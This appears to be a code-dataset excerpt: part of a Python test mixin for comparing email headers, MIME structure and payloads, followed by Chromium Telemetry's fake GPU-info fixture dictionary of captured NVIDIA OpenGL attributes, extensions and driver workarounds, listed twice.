'text/html' : lambda self, ct: self.try_assertXmlEqual,
'text/xml' : lambda self, ct: self.try_assertXmlEqual,
'text/*' : lambda self, ct: self.assertMultiLineEqual,
'*/*' : lambda self, ct: self.assertEqual,
}
#----------------------------------------------------------------------------
def registerMimeComparator(self, mimetype, comparator):
def factory(self, ct):
return comparator
self.mime_cmp_factories = dict(EmailTestMixin.mime_cmp_factories)
self.mime_cmp_factories[mimetype] = factory
#----------------------------------------------------------------------------
def _parseEmail(self, eml):
return email.message_from_string(eml)
#----------------------------------------------------------------------------
def assertEmailHeadersEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailHeadersEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailHeadersEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email headers %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailStructureEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailStructureEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailStructureEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email structure %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailContentEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailContentEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailContentEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email content %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
try:
self.assertEmailEqual(eml1, eml2, msg=msg, mime_cmp_factories=mime_cmp_factories)
self.fail(msg or 'email %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def _assertEmailHeadersEqual(self, msg1, msg2, msg=None):
hdr1 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg1)
hdr2 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg2)
self.assertMultiLineEqual(hdr1, hdr2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailStructureEqual(self, msg1, msg2, msg=None):
str1 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg1)
str2 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg2)
self.assertMultiLineEqual(str1, str2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailContentEqual(self, msg1, msg2, msg=None, mcf=None, context=None):
if context is None:
context = 'component root'
self.assertEqual(
msg1.is_multipart(), msg2.is_multipart(),
msg=makemsg(msg, context + ' is not multipart similar'))
self.assertEqual(
msg1.get_content_type(), msg2.get_content_type(),
msg=makemsg(msg, context + ' has content-type mismatch'))
if context == 'component root':
context = 'component ' + msg1.get_content_type()
if not msg1.is_multipart():
return self._assertEmailPayloadEqual(
msg1, msg2, msg=msg, mcf=mcf, context=context)
msgs1 = msg1.get_payload()
msgs2 = msg2.get_payload()
self.assertEqual(
len(msgs1), len(msgs2),
msg=makemsg(msg, context + ' has sub-message count mismatch'))
for idx, submsg in enumerate(msgs1):
sctxt = context + '[' + str(idx) + '] > ' + submsg.get_content_type()
self._assertEmailContentEqual(
submsg, msgs2[idx], msg=msg, mcf=mcf, context=sctxt)
#----------------------------------------------------------------------------
def _assertEmailPayloadEqual(self, msg1, msg2, msg=None, mcf=None, context='message'):
# paranoia...
self.assertFalse(msg1.is_multipart() or msg2.is_multipart())
self.assertEqual(msg1.get_content_type(), msg2.get_content_type())
# /paranoia...
dat1 = msg1.get_payload(decode=True)
dat2 = msg2.get_payload(decode=True)
def getcmp(msg, mcf):
ret = mcf.get(msg.get_content_type())
if ret is None:
ret = mcf.get(msg.get_content_maintype() + '/*')
if ret is None:
ret = mcf.get('*/*')
return ret
pcmp = None
if mcf is not None:
pcmp = getcmp(msg1, mcf)
if pcmp is None:
pcmp = getcmp(msg1, self.mime_cmp_factories)
self.assertIsNotNone(
pcmp, 'no comparator for mime-type "%s"' % (msg1.get_content_type(),))
pcmp = pcmp(self, msg1.get_content_type())
try:
pcmp(dat1, dat2)
except AssertionError as err:
raise AssertionError(
makemsg(msg, context + ' has different payload') + '; ' + err.message)
#----------------------------------------------------------------------------
def try_assertXmlEqual(self, dat1, dat2, msg=None):
if hasattr(self, 'assertXmlEqual'):
return self.assertXmlEqual(dat1, dat2)
return self.assertMultiLineEqual(dat1, dat2)
#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------ | en | 0.159517 | # -*- coding: utf-8 -*- #------------------------------------------------------------------------------ # file: $Id$ # auth: <NAME> <<EMAIL>> # date: 2013/10/21 # copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved. #------------------------------------------------------------------------------ # todo: this could be smarter... for example, it could: # - detect when references resolve to the same content, but # by different Content-IDs # - detect when multipart sections could collapse to the same # semantic structure #------------------------------------------------------------------------------ Returns a canonical string representation of the `message` headers, with the following changes made: * The MIME boundary specified in the "Content-Type" header, if specified, removed. * Any headers listed in `ignore` are removed. :Parameters: ignore : list(str), optional, default: ['Content-Transfer-Encoding'] List of headers that should not be included in the canonical form. #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- # paranoia... # /paranoia... #---------------------------------------------------------------------------- #------------------------------------------------------------------------------ # end of $Id$ #------------------------------------------------------------------------------ | 2.013546 | 2 |
telemetry/telemetry/testing/internal/fake_gpu_info.py | tingshao/catapult | 2,151 | 8008 | <reponame>tingshao/catapult<filename>telemetry/telemetry/testing/internal/fake_gpu_info.py
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This dictionary of GPU information was captured from a run of
# Telemetry on a Linux workstation with NVIDIA GPU. It helps test
# telemetry.internal.platform's GPUInfo class, and specifically the
# attributes it expects to find in the dictionary; if the code changes
# in an incompatible way, tests using this fake GPU info will begin
# failing, indicating this fake data must be updated.
#
# To regenerate it, import pdb in
# telemetry/internal/platform/gpu_info.py and add a call to
# pdb.set_trace() in GPUInfo.FromDict before the return statement.
# Print the attrs dictionary in the debugger and copy/paste the result
# on the right-hand side of this assignment. Then run:
#
# pyformat [this file name] | sed -e "s/'/'/g"
#
# and put the output into this file.
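# A rough sketch of that regeneration hook (the layout of GPUInfo.FromDict is
# an assumption based on the comment above, not verified against current code):
#
#   import pdb
#   ...
#   def FromDict(cls, attrs):
#     ...
#     pdb.set_trace()  # inspect and print `attrs`, then paste the result below
#     return cls(...)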
FAKE_GPU_INFO = {
'feature_status':
{
'flash_stage3d': 'enabled',
'gpu_compositing': 'enabled',
'video_decode': 'unavailable_software',
'flash_3d': 'enabled',
'webgl': 'enabled',
'video_encode': 'enabled',
'multiple_raster_threads': 'enabled_on',
'2d_canvas': 'unavailable_software',
'rasterization': 'disabled_software',
'flash_stage3d_baseline': 'enabled'
},
'aux_attributes':
{
'optimus': False,
'sandboxed': True,
'basic_info_state': 1,
'adapter_luid': 0.0,
'driver_version': '331.79',
'direct_rendering': True,
'amd_switchable': False,
'context_info_state': 1,
'process_crash_count': 0,
'pixel_shader_version': '4.40',
'gl_ws_version': '1.4',
'can_lose_context': False,
'driver_vendor': 'NVIDIA',
'max_msaa_samples': '64',
'software_rendering': False,
'gl_version': '4.4.0 NVIDIA 331.79',
'gl_ws_vendor': 'NVIDIA Corporation',
'vertex_shader_version': '4.40',
'initialization_time': 1.284043,
'gl_reset_notification_strategy': 33362,
'gl_ws_extensions':
'GLX_EXT_visual_info GLX_EXT_visual_rating GLX_SGIX_fbconfig '
'GLX_SGIX_pbuffer GLX_SGI_video_sync GLX_SGI_swap_control '
'GLX_EXT_swap_control GLX_EXT_swap_control_tear '
'GLX_EXT_texture_from_pixmap GLX_EXT_buffer_age '
'GLX_ARB_create_context GLX_ARB_create_context_profile '
'GLX_EXT_create_context_es_profile '
'GLX_EXT_create_context_es2_profile '
'GLX_ARB_create_context_robustness GLX_ARB_multisample '
'GLX_NV_float_buffer GLX_ARB_fbconfig_float GLX_NV_swap_group'
' GLX_EXT_framebuffer_sRGB GLX_NV_multisample_coverage '
'GLX_NV_copy_image GLX_NV_video_capture ',
'gl_renderer': 'Quadro 600/PCIe/SSE2',
'driver_date': '',
'gl_vendor': 'NVIDIA Corporation',
'gl_extensions':
'GL_AMD_multi_draw_indirect GL_ARB_arrays_of_arrays '
'GL_ARB_base_instance GL_ARB_blend_func_extended '
'GL_ARB_buffer_storage GL_ARB_clear_buffer_object '
'GL_ARB_clear_texture GL_ARB_color_buffer_float '
'GL_ARB_compatibility GL_ARB_compressed_texture_pixel_storage'
' GL_ARB_conservative_depth GL_ARB_compute_shader '
'GL_ARB_compute_variable_group_size GL_ARB_copy_buffer '
'GL_ARB_copy_image GL_ARB_debug_output '
'GL_ARB_depth_buffer_float GL_ARB_depth_clamp '
'GL_ARB_depth_texture GL_ARB_draw_buffers '
'GL_ARB_draw_buffers_blend GL_ARB_draw_indirect '
'GL_ARB_draw_elements_base_vertex GL_ARB_draw_instanced '
'GL_ARB_enhanced_layouts GL_ARB_ES2_compatibility '
'GL_ARB_ES3_compatibility GL_ARB_explicit_attrib_location '
'GL_ARB_explicit_uniform_location '
'GL_ARB_fragment_coord_conventions '
'GL_ARB_fragment_layer_viewport GL_ARB_fragment_program '
'GL_ARB_fragment_program_shadow GL_ARB_fragment_shader '
'GL_ARB_framebuffer_no_attachments GL_ARB_framebuffer_object '
'GL_ARB_framebuffer_sRGB GL_ARB_geometry_shader4 '
'GL_ARB_get_program_binary GL_ARB_gpu_shader5 '
'GL_ARB_gpu_shader_fp64 GL_ARB_half_float_pixel '
'GL_ARB_half_float_vertex GL_ARB_imaging '
'GL_ARB_indirect_parameters GL_ARB_instanced_arrays '
'GL_ARB_internalformat_query GL_ARB_internalformat_query2 '
'GL_ARB_invalidate_subdata GL_ARB_map_buffer_alignment '
'GL_ARB_map_buffer_range GL_ARB_multi_bind '
'GL_ARB_multi_draw_indirect GL_ARB_multisample '
'GL_ARB_multitexture GL_ARB_occlusion_query '
'GL_ARB_occlusion_query2 GL_ARB_pixel_buffer_object '
'GL_ARB_point_parameters GL_ARB_point_sprite '
'GL_ARB_program_interface_query GL_ARB_provoking_vertex '
'GL_ARB_robust_buffer_access_behavior GL_ARB_robustness '
'GL_ARB_sample_shading GL_ARB_sampler_objects '
'GL_ARB_seamless_cube_map GL_ARB_separate_shader_objects '
'GL_ARB_shader_atomic_counters GL_ARB_shader_bit_encoding '
'GL_ARB_shader_draw_parameters GL_ARB_shader_group_vote '
'GL_ARB_shader_image_load_store GL_ARB_shader_image_size '
'GL_ARB_shader_objects GL_ARB_shader_precision '
'GL_ARB_query_buffer_object '
'GL_ARB_shader_storage_buffer_object GL_ARB_shader_subroutine'
' GL_ARB_shader_texture_lod GL_ARB_shading_language_100 '
'GL_ARB_shading_language_420pack '
'GL_ARB_shading_language_include '
'GL_ARB_shading_language_packing GL_ARB_shadow '
'GL_ARB_stencil_texturing GL_ARB_sync '
'GL_ARB_tessellation_shader GL_ARB_texture_border_clamp '
'GL_ARB_texture_buffer_object '
'GL_ARB_texture_buffer_object_rgb32 '
'GL_ARB_texture_buffer_range GL_ARB_texture_compression '
'GL_ARB_texture_compression_bptc '
'GL_ARB_texture_compression_rgtc GL_ARB_texture_cube_map '
'GL_ARB_texture_cube_map_array GL_ARB_texture_env_add '
'GL_ARB_texture_env_combine GL_ARB_texture_env_crossbar '
'GL_ARB_texture_env_dot3 GL_ARB_texture_float '
'GL_ARB_texture_gather GL_ARB_texture_mirror_clamp_to_edge '
'GL_ARB_texture_mirrored_repeat GL_ARB_texture_multisample '
'GL_ARB_texture_non_power_of_two GL_ARB_texture_query_levels '
'GL_ARB_texture_query_lod GL_ARB_texture_rectangle '
'GL_ARB_texture_rg GL_ARB_texture_rgb10_a2ui '
'GL_ARB_texture_stencil8 GL_ARB_texture_storage '
'GL_ARB_texture_storage_multisample GL_ARB_texture_swizzle '
'GL_ARB_texture_view GL_ARB_timer_query '
'GL_ARB_transform_feedback2 GL_ARB_transform_feedback3 '
'GL_ARB_transform_feedback_instanced GL_ARB_transpose_matrix '
'GL_ARB_uniform_buffer_object GL_ARB_vertex_array_bgra '
'GL_ARB_vertex_array_object GL_ARB_vertex_attrib_64bit '
'GL_ARB_vertex_attrib_binding GL_ARB_vertex_buffer_object '
'GL_ARB_vertex_program GL_ARB_vertex_shader '
'GL_ARB_vertex_type_10f_11f_11f_rev '
'GL_ARB_vertex_type_2_10_10_10_rev GL_ARB_viewport_array '
'GL_ARB_window_pos GL_ATI_draw_buffers GL_ATI_texture_float '
'GL_ATI_texture_mirror_once GL_S3_s3tc GL_EXT_texture_env_add'
' GL_EXT_abgr GL_EXT_bgra GL_EXT_bindable_uniform '
'GL_EXT_blend_color GL_EXT_blend_equation_separate '
'GL_EXT_blend_func_separate GL_EXT_blend_minmax '
'GL_EXT_blend_subtract GL_EXT_compiled_vertex_array '
'GL_EXT_Cg_shader GL_EXT_depth_bounds_test '
'GL_EXT_direct_state_access GL_EXT_draw_buffers2 '
'GL_EXT_draw_instanced GL_EXT_draw_range_elements '
'GL_EXT_fog_coord GL_EXT_framebuffer_blit '
'GL_EXT_framebuffer_multisample '
'GL_EXTX_framebuffer_mixed_formats '
'GL_EXT_framebuffer_multisample_blit_scaled '
'GL_EXT_framebuffer_object GL_EXT_framebuffer_sRGB '
'GL_EXT_geometry_shader4 GL_EXT_gpu_program_parameters '
'GL_EXT_gpu_shader4 GL_EXT_multi_draw_arrays '
'GL_EXT_packed_depth_stencil GL_EXT_packed_float '
'GL_EXT_packed_pixels GL_EXT_pixel_buffer_object '
'GL_EXT_point_parameters GL_EXT_provoking_vertex '
'GL_EXT_rescale_normal GL_EXT_secondary_color '
'GL_EXT_separate_shader_objects '
'GL_EXT_separate_specular_color '
'GL_EXT_shader_image_load_store GL_EXT_shadow_funcs '
'GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_texture3D'
' GL_EXT_texture_array GL_EXT_texture_buffer_object '
'GL_EXT_texture_compression_dxt1 '
'GL_EXT_texture_compression_latc '
'GL_EXT_texture_compression_rgtc '
'GL_EXT_texture_compression_s3tc GL_EXT_texture_cube_map '
'GL_EXT_texture_edge_clamp GL_EXT_texture_env_combine '
'GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic '
'GL_EXT_texture_integer GL_EXT_texture_lod '
'GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp '
'GL_EXT_texture_object GL_EXT_texture_shared_exponent '
'GL_EXT_texture_sRGB GL_EXT_texture_sRGB_decode '
'GL_EXT_texture_storage GL_EXT_texture_swizzle '
'GL_EXT_timer_query GL_EXT_transform_feedback2 '
'GL_EXT_vertex_array GL_EXT_vertex_array_bgra '
'GL_EXT_vertex_attrib_64bit GL_EXT_x11_sync_object '
'GL_EXT_import_sync_object GL_IBM_rasterpos_clip '
'GL_IBM_texture_mirrored_repeat GL_KHR_debug '
'GL_KTX_buffer_region GL_NV_bindless_multi_draw_indirect '
'GL_NV_blend_equation_advanced GL_NV_blend_square '
'GL_NV_compute_program5 GL_NV_conditional_render '
'GL_NV_copy_depth_to_color GL_NV_copy_image '
'GL_NV_depth_buffer_float GL_NV_depth_clamp '
'GL_NV_draw_texture GL_NV_ES1_1_compatibility '
'GL_NV_explicit_multisample GL_NV_fence GL_NV_float_buffer '
'GL_NV_fog_distance GL_NV_fragment_program '
'GL_NV_fragment_program_option GL_NV_fragment_program2 '
'GL_NV_framebuffer_multisample_coverage '
'GL_NV_geometry_shader4 GL_NV_gpu_program4 '
'GL_NV_gpu_program4_1 GL_NV_gpu_program5 '
'GL_NV_gpu_program5_mem_extended GL_NV_gpu_program_fp64 '
'GL_NV_gpu_shader5 GL_NV_half_float GL_NV_light_max_exponent '
'GL_NV_multisample_coverage GL_NV_multisample_filter_hint '
'GL_NV_occlusion_query GL_NV_packed_depth_stencil '
'GL_NV_parameter_buffer_object GL_NV_parameter_buffer_object2'
' GL_NV_path_rendering GL_NV_pixel_data_range '
'GL_NV_point_sprite GL_NV_primitive_restart '
'GL_NV_register_combiners GL_NV_register_combiners2 '
'GL_NV_shader_atomic_counters GL_NV_shader_atomic_float '
'GL_NV_shader_buffer_load GL_NV_shader_storage_buffer_object '
'GL_ARB_sparse_texture GL_NV_texgen_reflection '
'GL_NV_texture_barrier GL_NV_texture_compression_vtc '
'GL_NV_texture_env_combine4 GL_NV_texture_expand_normal '
'GL_NV_texture_multisample GL_NV_texture_rectangle '
'GL_NV_texture_shader GL_NV_texture_shader2 '
'GL_NV_texture_shader3 GL_NV_transform_feedback '
'GL_NV_transform_feedback2 GL_NV_vdpau_interop '
'GL_NV_vertex_array_range GL_NV_vertex_array_range2 '
'GL_NV_vertex_attrib_integer_64bit '
'GL_NV_vertex_buffer_unified_memory GL_NV_vertex_program '
'GL_NV_vertex_program1_1 GL_NV_vertex_program2 '
'GL_NV_vertex_program2_option GL_NV_vertex_program3 '
'GL_NVX_conditional_render GL_NVX_gpu_memory_info '
'GL_SGIS_generate_mipmap GL_SGIS_texture_lod '
'GL_SGIX_depth_texture GL_SGIX_shadow GL_SUN_slice_accum '
},
'devices':
[
{
'device_string': '',
'vendor_id': 4318.0,
'device_id': 3576.0,
'vendor_string': ''
}],
'driver_bug_workarounds':
['clear_uniforms_before_first_program_use',
'disable_gl_path_rendering',
'init_gl_position_in_vertex_shader',
'init_vertex_attributes',
'remove_pow_with_constant_exponent',
'scalarize_vec_and_mat_constructor_args',
'use_current_program_after_successful_link',
'use_virtualized_gl_contexts']
}
| # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This dictionary of GPU information was captured from a run of
# Telemetry on a Linux workstation with NVIDIA GPU. It helps test
# telemetry.internal.platform's GPUInfo class, and specifically the
# attributes it expects to find in the dictionary; if the code changes
# in an incompatible way, tests using this fake GPU info will begin
# failing, indicating this fake data must be updated.
#
# To regenerate it, import pdb in
# telemetry/internal/platform/gpu_info.py and add a call to
# pdb.set_trace() in GPUInfo.FromDict before the return statement.
# Print the attrs dictionary in the debugger and copy/paste the result
# on the right-hand side of this assignment. Then run:
#
# pyformat [this file name] | sed -e "s/'/'/g"
#
# and put the output into this file.
FAKE_GPU_INFO = {
'feature_status':
{
'flash_stage3d': 'enabled',
'gpu_compositing': 'enabled',
'video_decode': 'unavailable_software',
'flash_3d': 'enabled',
'webgl': 'enabled',
'video_encode': 'enabled',
'multiple_raster_threads': 'enabled_on',
'2d_canvas': 'unavailable_software',
'rasterization': 'disabled_software',
'flash_stage3d_baseline': 'enabled'
},
'aux_attributes':
{
'optimus': False,
'sandboxed': True,
'basic_info_state': 1,
'adapter_luid': 0.0,
'driver_version': '331.79',
'direct_rendering': True,
'amd_switchable': False,
'context_info_state': 1,
'process_crash_count': 0,
'pixel_shader_version': '4.40',
'gl_ws_version': '1.4',
'can_lose_context': False,
'driver_vendor': 'NVIDIA',
'max_msaa_samples': '64',
'software_rendering': False,
'gl_version': '4.4.0 NVIDIA 331.79',
'gl_ws_vendor': 'NVIDIA Corporation',
'vertex_shader_version': '4.40',
'initialization_time': 1.284043,
'gl_reset_notification_strategy': 33362,
'gl_ws_extensions':
'GLX_EXT_visual_info GLX_EXT_visual_rating GLX_SGIX_fbconfig '
'GLX_SGIX_pbuffer GLX_SGI_video_sync GLX_SGI_swap_control '
'GLX_EXT_swap_control GLX_EXT_swap_control_tear '
'GLX_EXT_texture_from_pixmap GLX_EXT_buffer_age '
'GLX_ARB_create_context GLX_ARB_create_context_profile '
'GLX_EXT_create_context_es_profile '
'GLX_EXT_create_context_es2_profile '
'GLX_ARB_create_context_robustness GLX_ARB_multisample '
'GLX_NV_float_buffer GLX_ARB_fbconfig_float GLX_NV_swap_group'
' GLX_EXT_framebuffer_sRGB GLX_NV_multisample_coverage '
'GLX_NV_copy_image GLX_NV_video_capture ',
'gl_renderer': 'Quadro 600/PCIe/SSE2',
'driver_date': '',
'gl_vendor': 'NVIDIA Corporation',
'gl_extensions':
'GL_AMD_multi_draw_indirect GL_ARB_arrays_of_arrays '
'GL_ARB_base_instance GL_ARB_blend_func_extended '
'GL_ARB_buffer_storage GL_ARB_clear_buffer_object '
'GL_ARB_clear_texture GL_ARB_color_buffer_float '
'GL_ARB_compatibility GL_ARB_compressed_texture_pixel_storage'
' GL_ARB_conservative_depth GL_ARB_compute_shader '
'GL_ARB_compute_variable_group_size GL_ARB_copy_buffer '
'GL_ARB_copy_image GL_ARB_debug_output '
'GL_ARB_depth_buffer_float GL_ARB_depth_clamp '
'GL_ARB_depth_texture GL_ARB_draw_buffers '
'GL_ARB_draw_buffers_blend GL_ARB_draw_indirect '
'GL_ARB_draw_elements_base_vertex GL_ARB_draw_instanced '
'GL_ARB_enhanced_layouts GL_ARB_ES2_compatibility '
'GL_ARB_ES3_compatibility GL_ARB_explicit_attrib_location '
'GL_ARB_explicit_uniform_location '
'GL_ARB_fragment_coord_conventions '
'GL_ARB_fragment_layer_viewport GL_ARB_fragment_program '
'GL_ARB_fragment_program_shadow GL_ARB_fragment_shader '
'GL_ARB_framebuffer_no_attachments GL_ARB_framebuffer_object '
'GL_ARB_framebuffer_sRGB GL_ARB_geometry_shader4 '
'GL_ARB_get_program_binary GL_ARB_gpu_shader5 '
'GL_ARB_gpu_shader_fp64 GL_ARB_half_float_pixel '
'GL_ARB_half_float_vertex GL_ARB_imaging '
'GL_ARB_indirect_parameters GL_ARB_instanced_arrays '
'GL_ARB_internalformat_query GL_ARB_internalformat_query2 '
'GL_ARB_invalidate_subdata GL_ARB_map_buffer_alignment '
'GL_ARB_map_buffer_range GL_ARB_multi_bind '
'GL_ARB_multi_draw_indirect GL_ARB_multisample '
'GL_ARB_multitexture GL_ARB_occlusion_query '
'GL_ARB_occlusion_query2 GL_ARB_pixel_buffer_object '
'GL_ARB_point_parameters GL_ARB_point_sprite '
'GL_ARB_program_interface_query GL_ARB_provoking_vertex '
'GL_ARB_robust_buffer_access_behavior GL_ARB_robustness '
'GL_ARB_sample_shading GL_ARB_sampler_objects '
'GL_ARB_seamless_cube_map GL_ARB_separate_shader_objects '
'GL_ARB_shader_atomic_counters GL_ARB_shader_bit_encoding '
'GL_ARB_shader_draw_parameters GL_ARB_shader_group_vote '
'GL_ARB_shader_image_load_store GL_ARB_shader_image_size '
'GL_ARB_shader_objects GL_ARB_shader_precision '
'GL_ARB_query_buffer_object '
'GL_ARB_shader_storage_buffer_object GL_ARB_shader_subroutine'
' GL_ARB_shader_texture_lod GL_ARB_shading_language_100 '
'GL_ARB_shading_language_420pack '
'GL_ARB_shading_language_include '
'GL_ARB_shading_language_packing GL_ARB_shadow '
'GL_ARB_stencil_texturing GL_ARB_sync '
'GL_ARB_tessellation_shader GL_ARB_texture_border_clamp '
'GL_ARB_texture_buffer_object '
'GL_ARB_texture_buffer_object_rgb32 '
'GL_ARB_texture_buffer_range GL_ARB_texture_compression '
'GL_ARB_texture_compression_bptc '
'GL_ARB_texture_compression_rgtc GL_ARB_texture_cube_map '
'GL_ARB_texture_cube_map_array GL_ARB_texture_env_add '
'GL_ARB_texture_env_combine GL_ARB_texture_env_crossbar '
'GL_ARB_texture_env_dot3 GL_ARB_texture_float '
'GL_ARB_texture_gather GL_ARB_texture_mirror_clamp_to_edge '
'GL_ARB_texture_mirrored_repeat GL_ARB_texture_multisample '
'GL_ARB_texture_non_power_of_two GL_ARB_texture_query_levels '
'GL_ARB_texture_query_lod GL_ARB_texture_rectangle '
'GL_ARB_texture_rg GL_ARB_texture_rgb10_a2ui '
'GL_ARB_texture_stencil8 GL_ARB_texture_storage '
'GL_ARB_texture_storage_multisample GL_ARB_texture_swizzle '
'GL_ARB_texture_view GL_ARB_timer_query '
'GL_ARB_transform_feedback2 GL_ARB_transform_feedback3 '
'GL_ARB_transform_feedback_instanced GL_ARB_transpose_matrix '
'GL_ARB_uniform_buffer_object GL_ARB_vertex_array_bgra '
'GL_ARB_vertex_array_object GL_ARB_vertex_attrib_64bit '
'GL_ARB_vertex_attrib_binding GL_ARB_vertex_buffer_object '
'GL_ARB_vertex_program GL_ARB_vertex_shader '
'GL_ARB_vertex_type_10f_11f_11f_rev '
'GL_ARB_vertex_type_2_10_10_10_rev GL_ARB_viewport_array '
'GL_ARB_window_pos GL_ATI_draw_buffers GL_ATI_texture_float '
'GL_ATI_texture_mirror_once GL_S3_s3tc GL_EXT_texture_env_add'
' GL_EXT_abgr GL_EXT_bgra GL_EXT_bindable_uniform '
'GL_EXT_blend_color GL_EXT_blend_equation_separate '
'GL_EXT_blend_func_separate GL_EXT_blend_minmax '
'GL_EXT_blend_subtract GL_EXT_compiled_vertex_array '
'GL_EXT_Cg_shader GL_EXT_depth_bounds_test '
'GL_EXT_direct_state_access GL_EXT_draw_buffers2 '
'GL_EXT_draw_instanced GL_EXT_draw_range_elements '
'GL_EXT_fog_coord GL_EXT_framebuffer_blit '
'GL_EXT_framebuffer_multisample '
'GL_EXTX_framebuffer_mixed_formats '
'GL_EXT_framebuffer_multisample_blit_scaled '
'GL_EXT_framebuffer_object GL_EXT_framebuffer_sRGB '
'GL_EXT_geometry_shader4 GL_EXT_gpu_program_parameters '
'GL_EXT_gpu_shader4 GL_EXT_multi_draw_arrays '
'GL_EXT_packed_depth_stencil GL_EXT_packed_float '
'GL_EXT_packed_pixels GL_EXT_pixel_buffer_object '
'GL_EXT_point_parameters GL_EXT_provoking_vertex '
'GL_EXT_rescale_normal GL_EXT_secondary_color '
'GL_EXT_separate_shader_objects '
'GL_EXT_separate_specular_color '
'GL_EXT_shader_image_load_store GL_EXT_shadow_funcs '
'GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_texture3D'
' GL_EXT_texture_array GL_EXT_texture_buffer_object '
'GL_EXT_texture_compression_dxt1 '
'GL_EXT_texture_compression_latc '
'GL_EXT_texture_compression_rgtc '
'GL_EXT_texture_compression_s3tc GL_EXT_texture_cube_map '
'GL_EXT_texture_edge_clamp GL_EXT_texture_env_combine '
'GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic '
'GL_EXT_texture_integer GL_EXT_texture_lod '
'GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp '
'GL_EXT_texture_object GL_EXT_texture_shared_exponent '
'GL_EXT_texture_sRGB GL_EXT_texture_sRGB_decode '
'GL_EXT_texture_storage GL_EXT_texture_swizzle '
'GL_EXT_timer_query GL_EXT_transform_feedback2 '
'GL_EXT_vertex_array GL_EXT_vertex_array_bgra '
'GL_EXT_vertex_attrib_64bit GL_EXT_x11_sync_object '
'GL_EXT_import_sync_object GL_IBM_rasterpos_clip '
'GL_IBM_texture_mirrored_repeat GL_KHR_debug '
'GL_KTX_buffer_region GL_NV_bindless_multi_draw_indirect '
'GL_NV_blend_equation_advanced GL_NV_blend_square '
'GL_NV_compute_program5 GL_NV_conditional_render '
'GL_NV_copy_depth_to_color GL_NV_copy_image '
'GL_NV_depth_buffer_float GL_NV_depth_clamp '
'GL_NV_draw_texture GL_NV_ES1_1_compatibility '
'GL_NV_explicit_multisample GL_NV_fence GL_NV_float_buffer '
'GL_NV_fog_distance GL_NV_fragment_program '
'GL_NV_fragment_program_option GL_NV_fragment_program2 '
'GL_NV_framebuffer_multisample_coverage '
'GL_NV_geometry_shader4 GL_NV_gpu_program4 '
'GL_NV_gpu_program4_1 GL_NV_gpu_program5 '
'GL_NV_gpu_program5_mem_extended GL_NV_gpu_program_fp64 '
'GL_NV_gpu_shader5 GL_NV_half_float GL_NV_light_max_exponent '
'GL_NV_multisample_coverage GL_NV_multisample_filter_hint '
'GL_NV_occlusion_query GL_NV_packed_depth_stencil '
'GL_NV_parameter_buffer_object GL_NV_parameter_buffer_object2'
' GL_NV_path_rendering GL_NV_pixel_data_range '
'GL_NV_point_sprite GL_NV_primitive_restart '
'GL_NV_register_combiners GL_NV_register_combiners2 '
'GL_NV_shader_atomic_counters GL_NV_shader_atomic_float '
'GL_NV_shader_buffer_load GL_NV_shader_storage_buffer_object '
'GL_ARB_sparse_texture GL_NV_texgen_reflection '
'GL_NV_texture_barrier GL_NV_texture_compression_vtc '
'GL_NV_texture_env_combine4 GL_NV_texture_expand_normal '
'GL_NV_texture_multisample GL_NV_texture_rectangle '
'GL_NV_texture_shader GL_NV_texture_shader2 '
'GL_NV_texture_shader3 GL_NV_transform_feedback '
'GL_NV_transform_feedback2 GL_NV_vdpau_interop '
